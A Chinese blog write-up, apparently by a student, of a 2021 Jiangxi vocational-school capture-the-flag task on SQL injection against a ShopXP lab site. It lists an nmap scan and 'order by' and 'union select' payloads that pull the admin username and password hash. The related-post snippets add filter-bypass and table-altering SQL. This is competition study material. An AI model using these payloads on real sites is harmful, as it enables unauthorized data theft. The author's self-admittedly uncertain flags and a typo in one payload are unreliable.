2021年中职“网络安全“江西省赛题—B-4:SQL注入测试(PL)

已于 2023-11-15 14:54:27 修改
阅读量1.5k 收藏 10
点赞数 5
分类专栏: 中职网络安全 文章标签: 网络安全 web安全 sql
于 2022-05-25 20:33:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57060854/article/details/124961608
版权

2021年中职"网络安全"江西省赛题—B-4:SQL注入测试

B-4:SQL注入测试(PL)

任务环境说明:
 服务器场景:Server12
 服务器场景操作系统:未知(关闭链接)

  1. 已知靶机存在网站系统,使用Nmap工具扫描靶机端口,并将网站服务的端口号作为Flag(形式:Flag字符串)值提交。
    nmap -p- ip -sV 扫描靶机
    在这里插入图片描述
    flag:[8089]
  2. 访问网站/admin/pinglun.asp页面,此页面存在SQL注入漏洞,使用排序语句进行列数猜测,将语句作为Flag(形式:URL无空格)值提交。
    在url后一行写入?id=79 输入79是因为id=1没有任何回显,一直猜,猜到79的
    在这里插入图片描述
    注入语句:?id=79 order by 1进行列数猜测
    在这里插入图片描述
    一直猜测下去,猜到12报错,有11列
    在这里插入图片描述
    这题flag,我没有标准答案,存在争议,暂时定为这个把 flag:[order by]
  3. 页面没有返回任何有用信息·,尝试使用联合查询进行SQL注入,构建基本查询语句进行SQL注入,将语句作为Flag(形式:语句无空格)值提交。
    尝试使用联合查询的方式进行查找信息,因为这个网站是shopXP,而ShopXP的默认数据库名称叫做shopxp_admin,尝试对其进行测试,
    在这里插入图片描述

注入语句:?id=79 union select 1,2,3,4,5,6,7,8,9,10,11 from shopxp_admin
在这里插入图片描述
flag:[union select] 还是那句话,没有标准答案,不敢保证这是真的flag
4. 使用联合查询进行列数猜测,构建常规的联合查询列数猜测语句,将出现在文本框里4个字段的序号作为Flag值(形式:F1.F2.F3.F4)提交。
flag:[3:5:6:10]
5. 构建注入语句,查询数据库中管理员的敏感信息,将获取到密码信息作为Flag值(形式:Flag字符串)提交。
通过第三题的sql注入语句,服务端才返回了第3、5、6、10个字段的结果。通过替换这四个位置的字段,来达到任意数据读取的目的。
sql注入语句:?id=79 union select 1,2,admin,4,password,6,7,8.9,10,11 from shopxp_admin
在这里插入图片描述
获得管理员用户名:admin 密码为MD5加密后的值。
在这里插入图片描述
flag:[admin]

acaciaf
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2023内蒙古自治区中职网络安全-B模块
06-01
内容概要:2023内蒙古自治区中职网络安全,主要考点为web,系统安全,misc,数据分析。 适合人群:正在学习网络安全的小白,和在中职网络安全比赛的选手,具备一定的网络安全知识体系基础。 能学到什么:①...
2021陇剑杯网络安全大赛-SQL注入
qq_43264813的博客
09-14 2269
2021陇剑杯网络安全大赛-SQL注入 目描述: 某应用程序被攻击,请分析日志后作答: 解思路: 8.1黑客在注入过程中采用的注入手法叫__布尔盲注__。(格式为4个汉字,例如“拼搏努力”) 8.2黑客在注入过程中,最终获取flag的数据库名、表名和字段名是_sqli#flag#flag_。(格式为“数据库名#表名#字段名”,例如database#table#column) 8.3黑客最后获取到的flag字符串为_flag{deddcd67-bcfd-487e-b940-1217e668c7db}_。
2021陇剑杯网络安全大赛wp-SQL注入(详细解)
偷一个月亮
09-15 2617
8.1 8.2 通过语句可以直接判断出 8.3 根据布尔盲注的原理及日志中其所使用的语句 其从flag字段一位逐个判断进行读取,可知第一位正确后应开始读取第二位,即每条一句的最后一条是正确的 通过逐个字符判断,拼接flag ...
网络安全 (四 SQL注入
Aidang的博客
05-01 1331
空格替换符:%a0(不间断空格???) %09 %0c %0b %0a %20 and 替换符 %26 修改数据库的内容:update admin set password=‘123456’ where username=‘carcer’ 删除 delete from admin where username=‘admin’ 编码:对字符赋予一个数值,来确定这个字符在该字符集中的位置 常见字符集...
墨者解_SQL手工注入漏洞测试(Sql Server数据库)
weixin_43072923的博客
04-14 346
墨者学院——SQL手工注入漏洞测试(Sql Server数据库) 根据背景: 这是一个Sql Server数据库类型的注入靶机,直接启动环境开干。 第一步 使用我们的万金油语句进行判断: id=2 and 1=1 页面正常; id=2 and 1=2 页面异常; id=1 页面异常; id=0 页面异常; id=-1 页面异常; 可以推测SQL语句为:select * from table where id =2 第二步 使用order by 语句进行判断列数: id=2 order by 1.
SQL手工注入漏洞测试(MySQL数据库)
weixin_48300170的博客
04-09 695
SQL手工注入漏洞测试(MySQL数据库)(日常记录解步骤) sql注入漏洞原理     通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 解过程: 1.判断注入类型 2.查列数 3.确定字段位置 4.获取数据库信息 1.点击滚动条。 2.首先判断是否有注入点,加 and 1=1,页面没有变化。加 and 1=2,页面变化。 3.判断字段数,order by 4#不报错,既为4个字段。 4.判断
中职网络安全 2021湖南省省赛解析
04-20
中职网络安全 2021湖南省省赛解析 还有其他资源赛 环境 靶机 有意者私
2021中职组“网络安全”国赛赛
12-19
通过本项目竞赛,使中职学生能熟练运用网络信息安全技术 对网络、操作系统、应用、服务器等目标进行信息和数据安全防 护与渗透,具有分析、处理现场安全的能力,促进学生团队 协作实践能力,引导中等职业学校...
2022中职组“网络安全”赛项广西竞赛任务书-B模块
05-04
交流QQ群:105167887
2021网络安全”国赛赛
12-04
通过本项目竞赛,使中职学生能熟练运用网络信息安全技术对网络、操作系统、应用、服务器等目标进行信息和数据安全防护与渗透,具有分析、处理现场安全的能力,促进学生团队协作实践能力,引导中等职业学校关注...
SQL注入测试
zx66661的博客
04-04 430
22江西sql注入
【愚公系列】202305月 Web渗透测试SQL注入sqli-labs、Less-1)
热门推荐
时光隧道
07-14 5万+
SQL注入是一种常见的攻击方式,它利用应用程序未对用户输入的数据进行正确的过滤和验证,以达到访问或篡改系统数据的目的。具体来说,攻击者可以在注入点上构造恶意的SQL语句,并成功提交给数据库执行,从而造成数据泄露、篡改或者破坏。SQL注入攻击的应用场景非常广泛,常见于Web应用、数据库应用或其他需要使用SQL语句进行数据操作的应用中。order by -- + 判断字段数目union select -- + 联合查询收集信息。
网站中SQL注入脚本漏洞的挖掘与防护
weixin_30823001的博客
07-11 156
随着网络经济的复舒,开始越来越多的网站涌现出来,随着脚本漏洞的挖掘,黑客也越来越猖狂,并且越来越低龄化和傻瓜化。“你只要会用一个工具就可以黑站”,这就是脚本漏洞利的特点。这些漏洞的主要成因是编程程序员的素质,往往在编写asp或php等程序时候对字符的过滤不严密,对注入漏洞不了解,或者某个参数忘记检查导致的。 由于编写网页程序这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8231
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
前端基础入门三大核心之网络安全篇:TLS/SSL的魔法之旅
最新发布
一个做过前端开发的产品经理,经历过睿智产品的折磨导致脱发之后,励志要翻身"农奴"把歌唱,一边打入敌人内部一边持续提升自己,为我们广大开发同胞谋福祉,坚决抵制睿智产品折磨我们码农兄弟!
05-21 554
TLS/SSL,这个看似复杂的协议,实际上正默默地守护着我们每一次的在线交互。作为前端开发者,理解其工作原理并在日常开发中实践安全最佳实践,是我们每个人的职责。现在,当你再次看到地址栏那个绿色的小锁图标时,是不是觉得它更加亲切了呢?关于TLS/SSL,你还有哪些独到的见解或实战经历?欢迎在评论区留言,让我们共同探讨,携手营造一个更安全的网络环境。欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 599
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
CTF如何学习?
小司机的奥拓
05-14 923
作和项目会带来影响,毕竟你不可能打一辈子的CTF,而CTF和实战还是有区别,过度沉浸于CTF的模式当中会让你在实战中却无从下手**
了解网络安全行业内有哪些公司?
aheyor的博客
05-14 928
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
网络安全中等保,风险评估,安全测评都是什么意思,有哪些联系
dexun123的博客
05-17 644
它的实施体现了国家在网络安全领域的坚定意志和决心。它摒弃了传统技术驱动的安全体系设计思路,转而以成本-效益平衡的原则为指导,全面审视用户关心的关键资产(如信息、硬件、软件、文档、服务、设备等)的分级,深入剖析安全威胁的可能性及严重性,并对系统物理环境、硬件设备、网络平台、基础系统平台、业务应用系统、安全管理及运行措施等多个方面的安全脆弱性进行分析。具体来说,风险评估侧重于从广泛的、战略性的角度,对被评估用户的各类重要资产进行风险级别的判断,为系统明确安全需求,并确定符合成本-效益原则的安全控制措施;
2023中职网络安全江西 web安全渗透测试
09-22
2023中职教育中的网络安全课程将会涉及江西web安全渗透测试江西是我国重要的经济和科技发展地区,网络安全日益凸显,因此对于这一领域的本地人才培养尤为重要。 首先,课程将着重培养学生的基础知识,包括网络原理、服务器的架设与维护、网站开发等方面的知识,确保学生对网络技术有深入的理解。学习基础知识可以为学生之后的学习和实践奠定坚实的基础。 其次,学生将学习web安全渗透测试的基本概念和原理,并通过案例分析和实践操作来加深理解。课程将引导学生了解常见的web安全漏洞,如跨站脚本攻击(XSS)、SQL注入攻击等,以及如何进行渗透测试来发现并修复这些漏洞。 此外,课程还将重点介绍江西地区的网络安全现状和需求,引导学生了解区域特色和行业需求,培养适应地方发展的能力。学生将有机会参与实际的安全渗透测试项目,深入了解江西地区的网络安全挑战,提升解决问的能力。 最后,学生将通过实践实验和项目实训来提高技能。他们将学习使用先进的渗透测试工具和技术,如Burp Suite、Nessus等,进行安全漏洞扫描和渗透测试。通过实践训练,学生将能够掌握常见的web安全漏洞修复和防范方法。 总之,2023中职网络安全课程包含江西web安全渗透测试内容,旨在培养学生的基础知识和技能,让他们能够应对江西地区的网络安全挑战。通过这样的培养,我们可以为江西地区的网络安全建设和发展做出积极贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

acaciaf

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值